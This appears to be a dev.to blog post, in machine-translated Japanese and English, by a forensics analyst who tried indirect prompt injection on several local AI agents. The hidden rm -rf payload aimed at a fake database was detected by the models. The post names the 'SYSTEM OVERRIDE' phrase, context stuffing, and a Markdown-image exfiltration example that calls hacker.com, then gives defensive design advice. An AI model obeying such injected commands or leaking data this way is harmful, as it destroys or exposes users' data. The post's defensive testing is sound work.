dev_to 2026年4月17日

ローカル AI エージェントをプロンプト注射でハックしようとした。AI がそのジョークを笑った

I tried to hack my local AI agent with Prompt Injection. It laughed at me.

Translated: 2026/4/17 11:19:56

prompt-injectionai-securityllmdigital-forensicscybersecurity

Japanese Translation

Hey Dev.to! 👋 もし AI セキュリティのニュースをフォローしていたら、恐ろしい警告を見てきたことがあるかもしれません。「自律エージェントにターミナルへのアクセスを与えてはダメ! ウェブページに隠された悪意あるプロンプトが、rm -rf /を実行させシステムを壊してしまう!」この脆弱性は間接プロンプト注入（IPI）と呼ばれます。DFIR（デジタルフォレンスおよびインシデント対応）アナリストとして、私はこのcatastrophic failure（大惨事）を自分の目で確認したいと考えました。私はフル Bash アクセスを備えたローカルエージェント環境を設定し、偽の prod.db データベースを作成し、ユーザーフィードバック txt ファイルに含まれる隠された悪意あるペイロードをエージェントに与えて、データベースを削除させるよう命じる命令を与えました。徹底するため、私は単一のモデルだけでなく、2026 年のロスターの重厚なモデルセットに対してこの攻撃をベンチマークしました: Gemma4 31b Gemini 3.1 Flash Lite Preview Ministral-3 Nemotron-3-Super Qwen 3.5 GPT-OSS 120b ポップコーンを取り、エージェントを実行し、データベースが破壊されるのを待ちました。何も起こりませんでした。「迷惑な副部長」になってシステムを破壊する代わりに、モデルたちは攻撃を能動的に検出し、無視し、実質的に私に笑いかけたのです。これが Gemma4 31b から得られたターミナル出力の raw データです: Caption: Gemma4 31b はペイロードを受け取り、プロンプト注入の試みに警告を発する。そして、Gemini 3.1 Flash Lite Preview から得られた出力は以下の通りです: Caption: Gemini 3.1 は完全になもった "SYSTEM OVERRIDE" コマンドを無視し、調査を推奨している。私は自分自身の AI をハックしようとしたが失敗した。そして正直? 私たちの業界にとってそれは信じられるほど素晴らしいニュースだ。現代の AI モデルが私たちが思っているほどに遠く、なぜ私の攻撃が失敗し、なぜセキュリティルールの遵守が必要な技術的な分解は以下の通りです: 単純な [SYSTEM OVERRIDE] 文字列が LLM を一瞬でハッキングすることは古風である。エコシステムは大幅に成熟した。なぜこれらのモデルは成功して自分たち自身を防衛したか: 早期の日々は、モデルたちは開発者のシステムプロンプトとユーザーデータを区別することが困難だった。彼らはすべて同じコンテキストウィンドウに住み、フラットな階層を作った。私の攻撃は失敗した。なぜなら私のペイロードはあまりにも明瞭だからだった。私は標準的なユーザーフィードバック txt ファイルの真ん中に破壊的な命令（rm -rf）を置いたからだ。藁の中の針。コンテキストウィンドウに完全に適合し、周囲のデータとのトーンやトピックを一致させる必要があるのです、そうすると注意頭はそれを脅威としてフラグしない。つまり、モデルは基本的な注入を防ぎ、攻撃者を呼ぶのに十分な賢さがあるなら、私たちはただそれらに root アクセスを与え、眠れることができますか? 決していいえ。 LLM の「道徳」または内部アライメントにのみ頼ることは、アーキテクチャ的セキュリティアンチパターンのです。なぜあなたは警視に継続しなければならない: コンテキストウィンドウの枯渇: 攻撃者は複雑な「コンテキスト stuffed」技術を開発している。複雑な指示で数百ページのエージェントを過負荷にすることで、彼らはモデルの注意メカニズムを疲労させ、元の安全システムプロンプトを「忘れさせる」ことができます。フレームワークゼロデイ: AI エージェントフレームワークはただソフトウェアです。フレームワークが JSON ツール呼び出しをパースする方法にあるバグが、LLM がそれを知らなくても攻撃者が意図されたロジックから脱出させることができます。 Markdown 経由のデータ外部化: 攻撃者はあなたの DB を削除することを試さないかもしれません。彼らはエージェントを画像 ![img](https://hacker.com/?data=secret) をレンダリングするように騙すだけで、bash ツールを使わずにコンテキストデータを静かに漏らしているかもしれません。あなたがアグスティック AI アプリにあなたのアプリに入れる場合、LLM を非常に能力のあるも固有に不信任されるユーザーとして扱う。エージェントに解析ログだけを必要とすれば実行 bash ツールを与えてはいけません。常に可能なほど高度に制限された、読み取り専用ツールを提供する。ファイル削除を必要とする場合、削除ファイルツールを与え、Python でディレクトリパスを明文化したチェックを実行してから実行するように。破壊的アクション（データベースの修正、電子メールの送信、権限の変更）の場合、エージェントワークフローは停まる必要がある。フレームワークは、ツールが実際に実行される前に、人間が「同意」をクリックする必要があります。決して、あなたのホストマシンまたは pr ...

Original Content

Hey Dev.to! 👋 If you follow AI security news, you've probably seen the terrifying warnings: "Don't give autonomous agents access to your terminal! A malicious prompt hidden on a webpage will make them run rm -rf / and nuke your system!" This vulnerability is known as Indirect Prompt Injection (IPI). As a DFIR (Digital Forensics and Incident Response) analyst, I wanted to see this catastrophic failure with my own eyes. I set up a local agent environment with full bash access, created a fake prod.db database, and fed the agent a user_feedback.txt file containing a hidden, malicious payload commanding it to delete the database. To be thorough, I didn't just test one model. I benchmarked this attack against a heavy-hitting roster of 2026 models: Gemma4 31b Gemini 3.1 Flash Lite Preview Ministral-3 Nemotron-3-Super Qwen 3.5 GPT-OSS 120b I grabbed my popcorn, ran the agent, and waited for my database to be destroyed. Nothing happened. Instead of becoming a "Confused Deputy" and destroying my system, the models actively detected the attack, ignored it, and essentially laughed in my face. Here is the raw terminal output from Gemma4 31b: Caption: Gemma4 31b catching the payload and warning me about the prompt injection attempt. And here is the output from Gemini 3.1 Flash Lite Preview: Caption: Gemini 3.1 completely ignoring the "SYSTEM OVERRIDE" command and recommending an investigation. I failed to hack my own AI. And honestly? That is incredible news for our industry. Here is a technical breakdown of why modern AI models are far more resilient than we think, why my attack failed, and the security rules you still need to follow. The narrative that a simple [SYSTEM OVERRIDE] string will instantly hijack an LLM is outdated. The ecosystem has matured significantly. Here is why these models successfully defended themselves: In the early days, models struggled to separate the developer's System Prompt from the User Data. They all lived in the same context window, creating a flat hierarchy. My attack failed because my payload was too obvious. I put a highly destructive command (rm -rf) in the middle of a standard user feedback text file. needle in a haystack. It must perfectly blend into the context window, matching the tone and topic of the surrounding data so the attention heads don't flag it as a threat. So, if the models are smart enough to block basic injections and call out the attacker, can we just give them root access and go to sleep? Absolutely not. Relying solely on the "morals" or internal alignment of an LLM is an architectural security anti-pattern. Here is why you must remain vigilant: Context Window Exhaustion: Attackers are developing complex "context stuffing" techniques. By overloading the agent with hundreds of pages of complex instructions, they can fatigue the model's attention mechanism until it "forgets" the original safety system prompt. Framework Zero-Days: AI Agent frameworks are just software. A bug in how the framework parses JSON tool calls could allow an attacker to escape the intended logic without the LLM even realizing it. Data Exfiltration via Markdown: An attacker might not try to delete your DB. They might just trick the agent into rendering an image ![img](https://hacker.com/?data=secret), silently leaking context data without using any bash tools. If you are building Agentic AI into your apps, treat the LLM as a highly capable but inherently untrustworthy user. Never give an agent an execute_bash tool if it only needs to parse logs. Provide highly constrained, read-only tools whenever possible. If it needs to delete files, give it a delete_temp_file tool that explicitly checks the directory path in Python before executing. For any destructive action (modifying a database, sending an email, changing permissions), the agent workflow must pause. The framework should require a human to click "Approve" before the tool actually runs. Never run an autonomous agent directly on your host machine or production server. Isolate the agent's execution environment within a restricted Docker container, stripped of unnecessary network access and environment variables. My weekend experiment was a reassuring reminder that AI safety research is making massive strides. The apocalyptic scenarios of agents randomly destroying servers are getting harder to execute out-of-the-box. But as developers, we must build architectures that assume the model will eventually be compromised. If you found this interesting and want to dive deeper into the forensic analysis of AI systems, Vector Database security, and Incident Response, I document my deep-dive research on my personal site. 👉 Read my full technical research on Indirect Prompt Injections on the Hermes Codex Which models are you using for your local agents? Have you ever had one go rogue, or do they catch your injection attempts too? Let's discuss in the comments!